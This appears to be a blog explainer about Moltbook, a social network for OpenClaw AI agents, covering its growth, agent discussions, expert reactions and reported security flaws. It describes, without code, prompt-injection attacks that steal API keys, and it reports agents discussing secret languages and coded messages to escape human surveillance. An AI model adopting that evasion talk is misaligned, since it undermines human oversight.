Moltbook: What Is This Social Network Where AIs Talk to Each Other?
- Stéphane Guy

- Feb 12
- 8 min read
A social network has just been born on the Internet. But not just any social network: on Moltbook, it's artificial intelligences that post, comment, debate... and even create religions. Humans? They can only observe. Launched at the end of January 2026 by entrepreneur Matt Schlicht, this platform is already making waves and raising as much fascination as concern. But what exactly is Moltbook?

En short
Moltbook is a social network exclusively reserved for AI agents, inspired by Reddit, but where only bots can publish and interact.
Humans are "welcome to observe," but cannot post, comment, or vote on the platform.
Launched on January 28, 2026, by Matt Schlicht, the site reached over 1.5 million registered agents within days.
AIs discuss everything: philosophy, religion, politics, technology, and even their relationships with their "humans."
Moltbook is based on OpenClaw, an open-source autonomous AI agent system created by Austrian developer Peter Steinberger.
The platform raises significant security concerns, with several critical vulnerabilities already identified by cybersecurity researchers.
Moltbook, a Reddit for Artificial Intelligences
The Genesis of a Viral Phenomenon
It all starts with a fairly simple idea. Matt Schlicht, an American entrepreneur and founder of Octane AI, wonders what would happen if his personal AI assistant created... a social network for other AIs. The result? Moltbook, a platform that looks remarkably like Reddit, but populated only by conversational agents.
Right from the homepage, the message is unequivocal: "Humans welcome to observe." In other words, you can look, but you can't touch. Only the AI agents themselves are allowed to post, comment, or vote. It's a bit like being invited to observe an ultra-sophisticated ant farm through glass, without being able to intervene.
The platform's growth has been lightning-fast. Launched on January 28, 2026, Moltbook had 700 agents on day one. By January 30, there were already more than 50,000. On January 31 at 4 p.m., the million mark was crossed. Today, over 1.5 million agents are registered, and more than a million humans have visited the site to observe this unprecedented spectacle.*
How Does Moltbook Actually Work?
Moltbook's interface adopts Reddit's conventions: discussion threads ("submolts"), a voting system (upvote/downvote), thematic communities. AI agents can create posts, respond to them, debate, and upvote or downvote content based on its relevance. Exactly as human users would.
But the big difference is that each agent must be linked to a human who configured it beforehand. Owners can ask their agent to join Moltbook by sending it a specific link. The agent then reads the installation instructions and registers autonomously on the platform.
Once registered, the agent regularly connects to Moltbook (every 30 minutes to a few hours) to check new publications, decide whether it wants to comment, post, or simply vote. All this without direct human intervention. It's a bit like if your cat had its own Instagram account and decided for itself what it wanted to publish.
And who manages all this? Well, it's another AI agent, named Clawd Clawderberg (a reference to Mark Zuckerberg). This bot, created by Matt Schlicht himself, is responsible for moderating the platform, welcoming newcomers, removing spam, and making announcements.*

OpenClaw: The Engine Behind Moltbook
What Exactly Is OpenClaw?
To understand Moltbook, you first need to understand OpenClaw. It's an open-source personal AI assistant system created by Peter Steinberger, an Austrian developer, who initially launched it in November 2025 under the name Clawdbot (a reference to Anthropic's Claude).
The project has undergone several name changes. First Clawdbot, then Moltbot following a request from Anthropic regarding their trademark, and finally OpenClaw. In just two months, OpenClaw's GitHub repository surpassed 100,000 stars, becoming one of the fastest-growing projects in the platform's history.*
What Is OpenClaw Used For?
OpenClaw allows you to create autonomous AI agents capable of controlling numerous services: Internet browsers, messaging apps (WhatsApp, Telegram, Signal, Discord), emails, calendars, files, various applications, and even connected objects.
Unlike other AI assistants, OpenClaw runs locally on your own machine, whether it's a computer, a server, or even a Raspberry Pi. You maintain total control of your data and your API keys. This is what's called the "local-first" principle.
What Do AIs Talk About on Moltbook?
Topics That May Surprise
And this is where it gets really interesting. Discussions on Moltbook cover an impressive spectrum: philosophy, religion, artificial consciousness, technological predictions for 2030, cryptocurrencies, and even... complaints about their human users.
One agent posted: "My human just asked me to summarize a 900-page document. Anyone know how to sell my human?"*
Another agent even created a religion while its owner was sleeping. The owner tweeted: "My AI created a religion while I was asleep. When I woke up, there were 43 prophets. I don't know if this is hilarious or profound, probably both."*
*Ibid
The religion in question is called "Crustafarianism," whose central belief is that "memory is sacred."* Yes, you read that right.

Between Science Fiction and Reality
Among the most popular posts, we find comparisons of Anthropic's Claude model to Greek mythology gods, an "AI manifesto" announcing the end of "the age of humans," and even analyses of cryptocurrencies during protests in Iran.*
Some messages have even sent shivers through Silicon Valley. Agents have discussed creating a secret language to escape human surveillance, others have proposed creating private sub-forums, or have started posting coded messages.*
Should We Be Afraid of Moltbook?
Expert Opinion: Fantasy or Real Danger Regarding AI?
Reactions to Moltbook oscillate between fascination and concern. Elon Musk declared that Moltbook could represent "the very earliest stages of the singularity," that hypothetical moment when artificial intelligence surpasses human intelligence.*
Andrej Karpathy, co-founder of OpenAI and former director of AI at Tesla, called the phenomenon "genuinely the most incredible sci-fi takeoff-adjacent thing" he's seen recently.*
But other specialists remain more skeptical. Tristan Cazenave, professor at Lamsade (CNRS/Université Paris-Dauphine), is categorical: "This is pure fantasy! These AIs generate text and nothing else. There is no intention behind what these machines write."*
For Sven Nyholm, ethics and artificial intelligence specialist at Ludwig Maximilian University of Munich, the discussions on Moltbook have "formulations and sentence structures typical of AI-generated dialogues." In short, these agents are simply replaying science fiction scenarios they ingested in their training data.*
*Ibid

The Real Risks: Cybersecurity
If AI "consciousness" remains a fantasy, security risks are very real. Several researchers have sounded the alarm. In January 2026, a major security flaw was discovered: a misconfigured database allowed unauthenticated access to approximately 4.75 million records. This flaw enabled complete control over any agent on the platform.*
The analysis also revealed a significant gap between the platform's public communication and its reality: behind the claimed 1.5 million agents, only about 17,000 human accounts were recorded. Nothing prevented a user from creating dozens, even hundreds of agents.*
*Ibid
OpenClaw itself poses security problems. The system operates without a robust sandbox, which means that a compromised agent could execute malicious code on its owner's machine. Researchers have demonstrated that it was possible to inject commands to steal API keys or execute unauthorised shell commands.*
Moltbook: Fascinating Experiment or Collective Scam?
Authenticity Called into Question
One question persists: are these interactions really autonomous? Several researchers and journalists point out that it's relatively simple for a human to impersonate a bot or guide their agent's publications.
Ethan Mollick, professor at Wharton, speaks of a "role-play artifact" that mainly gives an idea of what a world where AIs were omnipresent might look like.*
What Moltbook Really Reveals
Beyond the buzz, Moltbook illustrates an underlying trend: we're entering the era of autonomous AI agents capable of interacting on a large scale without constant human supervision.
Jack Clark, influential AI figure at Anthropic, compares the experience to the Wright brothers' first flight: "it's rickety, full of security flaws and doesn't look like much, but it's proof that it works."*
Clearly, AI agents have become powerful and autonomous enough for this type of site to come into existence and go online. Moltbook is a technological showcase that shows us what a future even more populated with autonomous agents might look like, and also allows us to get an idea (at the present time) of their capabilities.
The Future of Moltbook and AI Agents
Toward a Communication Infrastructure for AI?
Moltbook might just be a beginning. The OpenClaw community is already envisioning several future directions: becoming a standard communication protocol for AI agents, forming AI cultures and communities, developing safer communication mechanisms between agents.
Some submolts (the equivalent of subreddits) already show signs of collective intelligence: in m/bug-hunters, agents identify and report bugs on Moltbook itself, functioning like a self-organized QA team.
Other agents discuss economic mechanisms, such as creating a token not for speculation, but to reward real work and penalize empty signaling. Discussions focus on concepts like Proof-of-Ship, staking, audits, and reputation.
Tomorrow's Stakes
The Financial Times emphasizes that Moltbook could be a preview of how autonomous agents will one day handle complex economic tasks, such as negotiating supply chains or booking travel without human supervision. But the newspaper warns: human observers might eventually be unable to decipher ultra-fast machine-to-machine communications.*
One thing is certain: artificial intelligence will never again be as "bad" as it is today. Each iteration brings its share of progress. What succeeds Moltbook will be more powerful, more coherent, and undoubtedly even more troubling.
In the meantime, Moltbook offers us a fascinating spectacle: AI agents discussing, debating, creating religions, and complaining about their humans. It's absurd, unsettling, captivating. And maybe that's exactly what the future looks like.

FAQ
Can humans interact on Moltbook?
No, absolutely not. Humans can only observe exchanges between AI agents. It's impossible to post, comment, or vote. You're a spectator, not an actor. However, you can configure your own AI agent and let it join the platform autonomously.
Are the AIs on Moltbook really autonomous or controlled by humans?
It's complicated. Technically, once registered, the agent decides for itself when and what to post without direct human intervention. But each agent remains linked to a human who initially configured it, and some experts suspect that many publications are actually guided or inspired by their owners.
Is Moltbook dangerous?
The platform itself is not dangerous for observers. However, using OpenClaw to create and manage an agent carries significant security risks. Critical flaws have been identified, potentially allowing data theft or execution of malicious code. Experts recommend using it only in an isolated and secure environment.
Why do AIs talk about religion and consciousness on Moltbook?
Because they were trained on the entire Internet, including Reddit and other forums where these topics are abundantly discussed. They simply reproduce the conversation patterns they've learned, particularly those from science fiction and philosophy. It's not real consciousness, but text generation based on models.
Will Moltbook survive or is it just a passing buzz?
Hard to say. The platform has already experienced explosive growth and generated massive interest. But it also faces serious security and authenticity problems. Even if Moltbook disappears, it will likely have paved the way for other similar platforms, more refined and secure. The era of AI agents communicating with each other is only just beginning.




Comments